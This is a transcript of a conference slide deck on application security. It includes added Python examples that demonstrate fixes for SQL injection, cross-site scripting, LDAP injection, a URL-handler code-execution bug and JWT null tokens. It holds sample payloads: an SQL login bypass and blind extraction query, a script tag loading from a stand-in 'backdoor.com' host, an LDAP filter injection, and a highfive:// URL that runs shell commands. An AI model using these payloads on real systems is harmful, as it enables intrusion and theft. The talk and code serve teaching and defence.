
AOEconf17: Application Security


AOEconf17 talk "Application Security" by Bastian Ike.

Published in: Software


  1. Application Security AOE Conf 2017
  2. What is Application Security?
  3. Application Security • Security in software • Not management security, perimeter security, etc • Possible Attack vectors • How to prevent issues
  4. Attack vectors
  5. Code Execution Make a system execute arbitrary code
  6. Buffer Overflows • Assembler code injected into memory • 1996, Aleph One, "Smashing the stack for fun and profit" • Possible by overflowing a program's memory with controlled data
  7. SQL Injection • Execute arbitrary SQL code • Possible by interpolating user-submitted data without proper escaping • Can be used to read/write files on DB server
  8. Cross Site Scripting • Execute arbitrary JavaScript in a privileged context • Executed on a client's machine • Privileged context: Browser (domain/cookies) • Steal/Modify cookies • AJAX Requests to privileged areas
  9. Cryptography Attack cryptographic measures for confidentiality and integrity
  10. Signatures • Fake signatures/tokens for unauthorised access
  11. Encryption • Break encryption • Missing encryption • Broken Encryption: • Example: Bleichenbacher RSA
  12. Business Logic Make legit code behave in an unintended way
  13. Race Conditions • Re-order execution flows to change an operation's result
  14. Exploit basics
  15. SQL Injection • Query: SELECT * FROM users WHERE username="${USERNAME}" AND password="${PASSWORD}"; • Username: Bastian • Password: Sesame098 • Query: SELECT * FROM users WHERE username="Bastian" AND password="Sesame098";
  16. SQL Injection • Query: SELECT * FROM users WHERE username="${USERNAME}" AND password="${PASSWORD}"; • Username: Bastian • Password: " OR 1=1 -- x • Query: SELECT * FROM users WHERE username="Bastian" AND password="" OR 1=1 -- x";
  17. SQL Injection • Query: SELECT * FROM logs WHERE token="${TOKEN}"; • Token: a" AND IF(SUBSTRING((SELECT password FROM users WHERE name="admin" LIMIT 1),0,1) = 'a', SLEEP(5), 0) -- x • Query: SELECT * FROM logs WHERE token="a" AND IF(SUBSTRING((SELECT password FROM users WHERE name="admin" LIMIT 1),0,1) = 'a', SLEEP(5), 0) -- x";
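The login bypass from slides 15 and 16, reproduced against an in-memory SQLite table as an added example (not code from the talk): the interpolated query accepts the `OR 1=1 --` password, the parameterised query does not. The example uses single-quoted string literals instead of the slides' double quotes so that it runs on any SQLite build; the table contents are constructed.

```python
import sqlite3

# Constructed in-memory user table mirroring the slide's example user
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('Bastian', 'Sesame098')")
    return con

def login_interpolated(con, username, password):
    # The slide's pattern: user data is spliced into the SQL text itself
    query = (f"SELECT * FROM users WHERE username='{username}' "
             f"AND password='{password}'")
    return con.execute(query).fetchone() is not None

def login_parameterised(con, username, password):
    # Fix: bind values as parameters; the driver never parses them as SQL
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return con.execute(query, (username, password)).fetchone() is not None

def demo():
    con = make_db()
    payload = "' OR 1=1 -- x"   # the slide's password, with a single quote
    return {
        "interpolated_valid": login_interpolated(con, "Bastian", "Sesame098"),
        "interpolated_injected": login_interpolated(con, "Bastian", payload),
        "parameterised_valid": login_parameterised(con, "Bastian", "Sesame098"),
        "parameterised_injected": login_parameterised(con, "Bastian", payload),
    }

if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{name}: {'login accepted' if accepted else 'login rejected'}")
```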
  18. 18. Cross-Site Scripting • Template: <a href="${page}">You are here</a> • URL: http://example.com/page=hello • Template: <a href="hello">You are here</a>
  19. Cross-Site Scripting • Template: <a href="${page}">You are here</a> • URL: http://example.com/page="><script src="http://backdoor.com/x.js"></script> • Template: <a href=""><script src="http://backdoor.com/x.js"></script>">You are here</a>
  20. Cross-Site Scripting • Code runs in Browser of the one opening the link • Access to Cookies+LocalStorage • Can send requests and read their result (emulate administrator behaviour) • Change page look/behaviour (steal passwords, etc)
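The attribute breakout from slide 19 beside the escaped rendering, as an added example (not from the talk). Python's `html.parser` stands in for the browser and lists the start tags it sees, so the check is on what gets parsed, not on string appearance; the payload is the slide's.

```python
import html
from html.parser import HTMLParser

def render_link_unescaped(page):
    # Slides 18/19: the page value is dropped straight into the href attribute
    return f'<a href="{page}">You are here</a>'

def render_link_escaped(page):
    # Fix: escape for the attribute context; quote=True also encodes " and '
    return f'<a href="{html.escape(page, quote=True)}">You are here</a>'

class StartTagCollector(HTMLParser):
    """Records every start tag a browser-like parser would create."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def start_tags(markup):
    parser = StartTagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags

# The slide's payload, used here as a constructed test input
PAYLOAD = '"><script src="http://backdoor.com/x.js"></script>'
```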
  21. Exploits samples
  22. Mattermost LDAP Injection • https://mattermost/api/v3/users/login • login_id: username)(givenName=test* • password: "" • Response: • 401: OK, query successful • 50x: Error, query failed
  23. Mattermost LDAP Injection
  24. Mattermost LDAP Injection
  25. Mattermost LDAP Injection
  26. Mattermost LDAP Injection • Prevention: properly escape characters which might be interpreted by LDAP
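The prevention from slide 26 worked through, as an added example (not Mattermost's code): RFC 4515 escaping of the filter metacharacters, applied to the slide's `login_id`. The filter shape `(&(objectClass=person)(uid=...))` is an assumption, since the talk shows only the injected value.

```python
# RFC 4515 escaping for values placed inside an LDAP search filter
LDAP_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}

def escape_ldap_filter_value(value):
    # Character-by-character mapping, so no replacement is escaped twice
    return "".join(LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)

def build_login_filter(login_id, escape=True):
    # Assumed filter shape (hypothetical); escape=False reproduces the bug
    value = escape_ldap_filter_value(login_id) if escape else login_id
    return f"(&(objectClass=person)(uid={value}))"

def count_filter_items(ldap_filter):
    # Structural check: user input must never change how many items the filter has
    return ldap_filter.count("(")
```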
  27. Highfive RCE • Target: URL-Handler highfive:// • Possible arguments: ?domain=, ?protocol=
  28. Highfive RCE (diagram) • Privileged / Non-Privileged • Display Web-pages • Execute processes etc • Highfive Sandbox (NW.js) • Whitelist: https://highfive.com https://dev.highfive.com
  29. Highfive RCE • highfive://test.com.a/?domain=alert(require('child_process').execSync('hostname;echo;id').toString())//&protocol=javascript • Starts Highfive on a privileged initial domain • Redirects to: protocol + '://' + domain + path • Becomes: javascript://alert(require('child_process').execSync('hostname;echo;id').toString())//something
  30. Highfive RCE • Redirect to javascript:// does not change the sandbox • Works on any operating system • Thank you JavaScript 😙
  31. Highfive RCE • Prevention: whitelist redirect targets
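The prevention from slide 31 as an added example (not Highfive's code): the redirect target is assembled the way slide 29 describes, then checked against slide 28's whitelist by scheme and exact hostname before it is used. The handler function and its fallback URL are assumptions.

```python
from urllib.parse import urlsplit

# Slide 28's whitelist, kept as an exact-hostname allowlist
ALLOWED_HOSTS = {"highfive.com", "dev.highfive.com"}

def build_redirect(protocol, domain, path=""):
    # Slide 29: the target is assembled as protocol + '://' + domain + path
    return f"{protocol}://{domain}{path}"

def is_allowed_redirect(url):
    """Allow only https:// URLs whose host is exactly on the allowlist."""
    parts = urlsplit(url)
    if parts.scheme != "https":                  # rejects javascript:, http:, ...
        return False
    if parts.username is not None or parts.password is not None:
        return False                             # https://highfive.com@other.example/
    if parts.port not in (None, 443):
        return False
    return parts.hostname in ALLOWED_HOSTS       # no suffix/prefix matching

def redirect_target(protocol, domain, path="", fallback="https://highfive.com/"):
    # Assumed handler: use the requested target only if allowed, else the app origin
    url = build_redirect(protocol, domain, path)
    return url if is_allowed_redirect(url) else fallback
```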
  32. JWT Null Tokens
  33. JWT Null Tokens
  34. JWT Null Tokens
  35. JWT Null Tokens
  36. JWT Null Tokens • Prevention: Do not allow null signature algorithms
  37. Preventive actions
  38. Finding Security issues • Code Reviews • Curiosity • (sometimes: automated scanners)
  39. Stay up to date
  40. React fast
  41. React fast • Escalation plan for security incidents • Fast deployment strategies • Firewall setup to cut off possible infected systems • Snapshot infrastructure for later analysis
  42. Thank you :) Questions?
